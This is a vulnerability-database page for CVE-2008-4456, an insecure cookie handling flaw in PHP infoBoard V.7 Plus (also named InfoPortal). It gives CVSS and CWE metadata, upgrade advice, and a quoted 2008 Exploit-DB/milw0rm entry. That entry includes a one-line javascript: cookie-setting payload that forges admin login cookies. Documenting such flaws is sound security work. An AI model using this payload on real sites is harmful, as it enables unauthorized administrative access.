header-logo
Suggest Exploit
vendor:
InfoPortal V.7 Plus
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: InfoPortal V.7 Plus
Affected Version From: V.7 Plus
Affected Version To: V.7 Plus
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:infoportal:infoportal_v7_plus
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability

The vulnerability exists due to insecure handling of cookies in PHP infoBoard V.7 Plus. An attacker can exploit this vulnerability to gain administrative access to the vulnerable application.

Mitigation:

Upgrade to the latest version of PHP infoBoard V.7 Plus.
Source

Exploit-DB raw data:

###############################################################################################
[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
[+] Discovered By Stack               
[+] Greetz : All my freind              
################################################################################################
---
exploit:

javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";

# milw0rm.com [2008-09-25]